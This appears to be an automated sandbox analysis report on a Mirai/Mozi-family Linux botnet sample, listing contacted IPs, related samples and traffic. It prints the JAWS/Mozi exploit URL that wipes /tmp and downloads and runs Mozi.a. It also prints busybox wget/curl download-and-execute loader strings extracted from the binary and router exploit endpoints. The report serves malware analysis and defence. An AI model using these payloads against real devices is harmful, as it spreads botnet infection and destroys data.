http://99.219.59.203:49152/soap.cgi?service=WANIPConn1	true	Avira URL Cloud: safe	unknown
http://146.249.197.42:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://117.201.100.204:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown
http://39.167.82.235:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://149.239.18.173:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://4.222.236.14:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://53.189.162.142:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://14.91.101.35:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://204.181.118.146:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown
http://155.65.230.109:37215/ctrlt/DeviceUpgrade_1	false	Avira URL Cloud: safe	unknown
http://125.200.222.101:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://13.1.80.75:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown
http://69.229.221.117:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://139.39.140.82:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown
http://177.200.207.58:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://207.148.48.191:37215/ctrlt/DeviceUpgrade_1	false	Avira URL Cloud: safe	unknown
http://179.212.119.100:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown
http://123.154.158.173:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://142.190.2.119:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://196.103.201.163:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://211.138.21.19:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown
http://191.42.122.94:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown
http://63.164.155.1:37215/ctrlt/DeviceUpgrade_1	false	Avira URL Cloud: safe	unknown
http://48.128.115.213:49152/soap.cgi?service=WANIPConn1	true	Avira URL Cloud: safe	unknown
http://67.28.77.205:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown
http://68.148.176.5:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://159.88.243.196:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown
http://139.35.76.83:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)	bin.sh.elf, networks.34.dr	false		high
http://www.alsa-project.org.	alsa-info.sh.34.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
157.139.78.181	unknown	United States	20252	JSIWMCUS	false
181.111.132.84	unknown	Argentina	7303	TelecomArgentinaSAAR	false
66.173.67.223	unknown	United States	4181	TDS-ASUS	false
44.182.147.239	unknown	United States	58247	NETVEILLANCERO	false
97.137.140.224	unknown	United States	6167	CELLCO-PARTUS	false
186.179.189.32	unknown	Suriname	27775	TelecommunicationcompanySuriname-TeleSurSR	false
68.90.91.181	unknown	United States	7018	ATT-INTERNET4US	false
57.99.214.87	unknown	Belgium	51964	ORANGE-BUSINESS-SERVICES-IPSN-ASNFR	false
169.173.214.105	unknown	United States	37611	AfrihostZA	false
76.39.219.104	unknown	United States	18494	CENTURYLINK-LEGACY-EMBARQ-WRBGUS	false
162.231.86.136	unknown	United States	7018	ATT-INTERNET4US	false
106.66.11.161	unknown	India	45271	ICLNET-AS-APIdeaCellularLimitedIN	false
66.253.240.90	unknown	United States	46925	PAVLOVMEDIA-SEUS	false
87.125.199.76	unknown	Spain	12430	VODAFONE_ESES	false
50.117.190.69	unknown	Canada	53910	NWST-SATCA	false
58.205.211.114	unknown	China	4538	ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	false
110.190.237.193	unknown	China	38283	CHINANET-SCIDC-AS-APCHINANETSiChuanTelecomInternetData	false
116.175.37.80	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
14.0.97.178	unknown	Korea Republic of	38107	CDNETWORKS-AS-KRCDNetworksKR	false
146.120.127.194	unknown	Czech Republic	197433	TK-ORION-ASUA	false
179.120.163.226	unknown	Brazil	26615	TIMSABR	false
23.7.221.74	unknown	United States	20940	AKAMAI-ASN1EU	false
158.86.252.199	unknown	United States	20379	NET-BAKERUS	false
183.34.226.94	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
45.133.82.239	unknown	United Kingdom	1828	UNITASUS	false
111.71.168.62	unknown	Taiwan; Republic of China (ROC)	17421	EMOME-NETMobileBusinessGroupTW	false
74.34.236.90	unknown	United States	7011	FRONTIER-AND-CITIZENSUS	false
174.8.113.81	unknown	United States	6327	SHAWCA	false
59.83.180.134	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
72.211.6.139	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
154.187.3.120	unknown	Egypt	8452	TE-ASTE-ASEG	false
6.235.243.192	unknown	United States	3356	LEVEL3US	false
153.130.11.71	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
131.134.121.22	unknown	Canada	74	SSC-299-Z-74CA	false
115.122.131.6	unknown	China	4847	CNIX-APChinaNetworksInter-ExchangeCN	false
216.186.136.8	unknown	United States	12083	WOW-INTERNETUS	false
171.79.99.1	unknown	India	24560	AIRTELBROADBAND-AS-APBhartiAirtelLtdTelemediaServices	true
102.97.7.108	unknown	Morocco	36925	ASMediMA	false
217.89.158.155	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
39.170.191.118	unknown	China	56041	CMNET-ZHEJIANG-APChinaMobilecommunicationscorporationC	false
218.9.165.42	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
147.21.126.56	unknown	United States	53418	DIRECTV-LOSANGELESUS	false
87.122.11.33	unknown	Germany	8881	VERSATELDE	false
100.167.228.89	unknown	United States	21928	T-MOBILE-AS21928US	false
184.105.242.13	unknown	United States	395100	RVBA2016US	false
164.139.228.99	unknown	Germany	8569	MSYSDE	false
5.53.253.70	unknown	Bulgaria	13124	IBGCBG	false
88.134.94.149	unknown	Germany	31334	KABELDEUTSCHLAND-ASDE	false
152.160.110.160	unknown	United States	12129	123NETUS	false
48.157.74.54	unknown	United States	2686	ATGS-MMD-ASUS	false
173.172.81.60	unknown	United States	11427	TWC-11427-TEXASUS	false
166.34.167.237	unknown	United States	3372	MCI-ASNUS	false
104.50.209.45	unknown	United States	7018	ATT-INTERNET4US	false
202.224.220.246	unknown	Japan	2514	INFOSPHERENTTPCCommunicationsIncJP	false
164.97.228.150	unknown	Australia	38470	DIBP-AS-APDIBPAU	false
113.242.65.111	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
104.253.241.8	unknown	United States	18779	EGIHOSTINGUS	false
167.222.231.15	unknown	Reserved	3598	MICROSOFT-CORP-ASUS	false
207.228.233.232	unknown	United States	14361	HOPONE-GLOBALUS	false
46.137.14.222	unknown	Ireland	16509	AMAZON-02US	false
93.75.145.101	unknown	Ukraine	25229	VOLIA-ASUA	false
134.141.166.125	unknown	United States	6363	ENTERASYS-NETWORKSUS	false
161.243.163.247	unknown	United States	36548	ASCOJUS	false
142.129.210.84	unknown	United States	20001	TWC-20001-PACWESTUS	false
185.60.44.235	unknown	Russian Federation	29124	ISKRATELECOM-ASSEVEN-SKYRU	false
211.145.249.18	unknown	China	4808	CHINA169-BJChinaUnicomBeijingProvinceNetworkCN	false
61.137.191.171	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
88.98.103.252	unknown	Spain	43160	ES-MDC-DATACENTERMalagaDataCenterES	false
98.175.160.159	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
89.23.71.30	unknown	Serbia	52116	ORIONTELEKOM-DPI-ASRS	false
77.222.109.164	unknown	Russian Federation	8369	INTERSVYAZ-AS38-BKomsomolskyprospektRU	false
65.198.253.101	unknown	United States	701	UUNETUS	false
13.111.101.150	unknown	United States	22606	EXACT-7US	false
38.10.165.171	unknown	United States	174	COGENT-174US	false
187.22.87.34	unknown	Brazil	28573	CLAROSABR	false
101.31.182.131	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
97.199.39.93	unknown	United States	6167	CELLCO-PARTUS	false
43.7.231.155	unknown	Japan	4249	LILLY-ASUS	false
68.75.100.233	unknown	United States	7018	ATT-INTERNET4US	false
102.42.85.213	unknown	Egypt	8452	TE-ASTE-ASEG	false
218.158.128.23	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
1.49.139.39	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
146.61.7.81	unknown	United States	3209	VODANETInternationalIP-BackboneofVodafoneDE	false
203.186.101.240	unknown	Hong Kong	9269	HKBN-AS-APHongKongBroadbandNetworkLtdHK	false
195.144.8.59	unknown	United Kingdom	47813	SEMANTICOGB	false
61.170.255.194	unknown	China	4812	CHINANET-SH-APChinaTelecomGroupCN	false
4.171.104.23	unknown	United States	3356	LEVEL3US	false
136.36.91.188	unknown	United States	16591	GOOGLE-FIBERUS	false
135.253.214.20	unknown	United States	10455	LUCENT-CIOUS	false
89.190.123.91	unknown	Lithuania	41228	NNT-AS41228LT	false
171.236.227.155	unknown	Viet Nam	7552	VIETEL-AS-APViettelGroupVN	false
176.144.34.60	unknown	France	5410	BOUYGTEL-ISPFR	false
171.236.227.152	unknown	Viet Nam	7552	VIETEL-AS-APViettelGroupVN	false
103.42.164.12	unknown	unknown	38742	AWCC-AS-APAWCCAF	false
22.206.3.175	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
102.17.248.221	unknown	unknown	37054	Telecom-MalagasyMG	false
211.191.185.127	unknown	Korea Republic of	4670	HYUNDAI-KRShinbiroKR	false
196.6.17.233	unknown	South Africa	36974	AFNET-ASCI	false
173.69.79.11	unknown	United States	701	UUNETUS	false
219.70.169.220	unknown	Taiwan; Republic of China (ROC)	9416	MULTIMEDIA-AS-APHoshinMultimediaCenterIncTW	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
157.139.78.181	p4Sa8sk5fM.elf	Get hash	malicious	Mirai, Moobot	Browse
66.173.67.223	aPu2pUmHzL.elf	Get hash	malicious	Mirai	Browse
44.182.147.239	6qTuRwkI5A.elf	Get hash	malicious	Unknown	Browse
146.120.127.194	PRu3JHI5wz	Get hash	malicious	Mirai	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
dht.transmissionbt.com	na.elf	Get hash	malicious	Mirai	Browse	87.98.162.88
	SecuriteInfo.com.Trojan.Crypt.23519.13317.exe	Get hash	malicious	Unknown	Browse	212.129.33.59
	SecuriteInfo.com.Trojan.Crypt.23519.13317.exe	Get hash	malicious	Unknown	Browse	212.129.33.59
	SecuriteInfo.com.Riskware.OfferCore.5002.4698.exe	Get hash	malicious	PrivateLoader	Browse	87.98.162.88
	5d9fe2735d4399d98e6e6a792b1feb26d6f2d9a5d77944ecacb4b4837e5e5fca.zip	Get hash	malicious	Xmrig	Browse	87.98.162.88
	240506-b7lv1sfmcw_pw_infected.zip	Get hash	malicious	Xmrig	Browse	87.98.162.88
	240506-b7lv1sfmcw_pw_infected.zip	Get hash	malicious	Xmrig	Browse	87.98.162.88
	5d9fe2735d4399d98e6e6a792b1feb26d6f2d9a5d77944ecacb4b4837e5e5fca.zip	Get hash	malicious	Xmrig	Browse	87.98.162.88
	na.elf	Get hash	malicious	Mirai	Browse	87.98.162.88
	Photo.scr.exe	Get hash	malicious	Xmrig	Browse	87.98.162.88

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
JSIWMCUS	debug.dbg.elf	Get hash	malicious	Mirai, Moobot	Browse	157.139.31.165
	x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse	157.139.31.109
	la.bot.sparc.elf	Get hash	malicious	Unknown	Browse	140.251.34.90
	o2YUBeMZW6.elf	Get hash	malicious	Mirai	Browse	157.139.31.161
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse	140.251.46.19
	arm7.elf	Get hash	malicious	Unknown	Browse	140.251.34.87
	h3G4uG7Kqi.elf	Get hash	malicious	Mirai	Browse	157.139.31.174
	mpsl.elf	Get hash	malicious	Mirai, Moobot	Browse	157.139.187.6
	bnrKk80Fa9.elf	Get hash	malicious	Mirai	Browse	157.139.31.158
	dNBHFhYkoO.elf	Get hash	malicious	Mirai, Okiru	Browse	157.139.250.3
TDS-ASUS	arm.elf	Get hash	malicious	Mirai	Browse	69.128.86.143
	mpsl.elf	Get hash	malicious	Mirai	Browse	69.131.158.99
	.pjyhwsdgkl.elf	Get hash	malicious	Unknown	Browse	184.60.188.74
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	69.131.173.173
	splm68k.elf	Get hash	malicious	Unknown	Browse	69.11.194.75
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	139.135.176.204
	botx.m68k.elf	Get hash	malicious	Mirai	Browse	69.128.130.253
	botx.x86.elf	Get hash	malicious	Mirai	Browse	24.75.192.92
	m68k.elf	Get hash	malicious	Mirai, Gafgyt	Browse	69.131.183.25
	ppc.elf	Get hash	malicious	Mirai	Browse	184.61.110.116
TelecomArgentinaSAAR	mpsl.elf	Get hash	malicious	Mirai	Browse	181.30.220.7
	sparc.elf	Get hash	malicious	Okiru	Browse	181.9.213.110
	mpsl.elf	Get hash	malicious	Mirai	Browse	190.224.109.108
	.pjyhwsdgkl.elf	Get hash	malicious	Unknown	Browse	181.110.46.191
	jmggnxeedy.elf	Get hash	malicious	Unknown	Browse	181.166.245.156
	pbnpvwfhco.elf	Get hash	malicious	Unknown	Browse	186.127.121.223
	jmggnxeedy.elf	Get hash	malicious	Unknown	Browse	181.231.109.204
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	190.195.213.10
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	190.228.155.119
	arm7.elf	Get hash	malicious	Mirai	Browse	190.230.208.103

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/init.d/S95baby.sh	bin.sh.elf	Get hash	malicious	Mirai	Browse
	na.elf	Get hash	malicious	Mirai	Browse
	bin.sh.elf	Get hash	malicious	Mirai	Browse
	na.elf	Get hash	malicious	Mirai	Browse
	bin.sh	Get hash	malicious	Mirai	Browse
	bin.sh	Get hash	malicious	Mirai	Browse
	3aakN9FzA5	Get hash	malicious	Gafgyt Mirai	Browse
	Mozi.m.3	Get hash	malicious	Mirai	Browse
	ZFvtIZszMd	Get hash	malicious	Mirai	Browse
	bin.sh	Get hash	malicious	Mirai	Browse

Source: /tmp/bin.sh.elf (PID: 6257)	Opens: /proc/net/route			Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6257)	Opens: /proc/net/route			Jump to behavior

Source: bin.sh.elf	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: bin.sh.elf	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh \|\|curl -O http://%s:%d/bin.sh \|\|/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh \|\|(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: bin.sh.elf	String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: networks.34.dr	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: networks.34.dr	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh \|\|curl -O http://%s:%d/bin.sh \|\|/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh \|\|(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: networks.34.dr	String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'

Source: global traffic	TCP traffic: 100.49.226.162 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 109.227.125.29 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 44.237.251.105 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 152.127.1.190 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 97.91.236.206 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 152.0.87.200 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 199.201.191.100 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 52.160.156.2 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 146.25.213.174 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 48.128.115.213 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 175.176.33.31 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 196.204.108.175 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 85.206.232.118 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 46.89.254.44 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 75.221.225.250 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 221.219.229.131 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 114.117.212.4 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 198.219.16.2 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 79.254.93.26 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 151.95.79.143 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 163.197.220.203 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 134.87.142.186 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 169.189.175.4 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 107.201.204.124 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 6.205.85.158 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 74.42.253.221 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 202.214.164.77 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 144.95.201.80 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 73.230.184.19 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 137.40.92.251 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 106.222.158.5 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 58.37.190.45 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 217.112.237.238 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 79.35.50.92 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 38.7.77.71 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 190.22.11.98 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 36.64.74.203 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 211.75.126.69 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 33.93.201.252 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 68.169.46.188 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 175.170.71.155 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 126.210.97.150 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 128.39.179.200 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 111.4.180.69 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 58.189.121.169 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 54.197.126.116 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 82.222.192.8 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 8.189.90.201 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 187.38.102.206 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 2.144.168.159 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 91.91.58.110 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 9.56.220.231 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 111.150.127.171 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 82.114.241.74 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 171.119.20.118 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 215.230.56.175 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 128.160.247.151 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 171.177.75.220 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 164.49.37.152 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 61.77.120.5 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 101.189.50.38 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 169.158.193.51 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 217.15.207.28 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 180.113.188.93 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 84.108.181.121 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 100.12.64.164 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 86.214.31.28 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 121.95.76.250 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 186.96.78.186 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 143.207.148.54 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 84.51.179.123 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 110.87.214.87 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 123.86.59.14 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 9.15.166.129 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 159.175.193.207 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 83.88.254.107 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 131.62.122.210 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 178.233.21.105 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 68.101.86.227 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 25.125.5.55 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 132.20.246.253 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 165.72.140.124 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 100.215.73.157 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 139.246.211.115 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 153.118.180.181 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 24.168.141.210 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 220.112.244.93 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 125.125.201.185 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 203.211.100.123 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 178.25.78.182 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 87.170.218.169 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 141.244.188.12 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 124.127.132.57 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 158.70.45.62 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 171.23.177.240 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 35.184.146.118 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 170.254.161.26 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 220.235.116.138 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 203.108.157.203 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 128.118.97.120 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 157.237.189.119 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 195.214.23.156 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 220.234.56.30 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 60.61.74.47 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 142.172.142.87 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 197.48.190.105 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 66.197.17.76 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 3.111.24.133 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 99.219.59.203 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 75.202.127.58 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 144.141.113.17 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 167.242.62.228 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 70.172.81.219 ports 1,2,3,5,7,37215

Source: /tmp/bin.sh.elf (PID: 6244)	Reads hosts file: /etc/hosts	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6261)	Reads hosts file: /etc/hosts	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6265)	Reads hosts file: /etc/hosts	Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 11.190.108.117
Source: unknown	TCP traffic detected without corresponding DNS query: 140.221.39.242
Source: unknown	TCP traffic detected without corresponding DNS query: 178.25.78.182
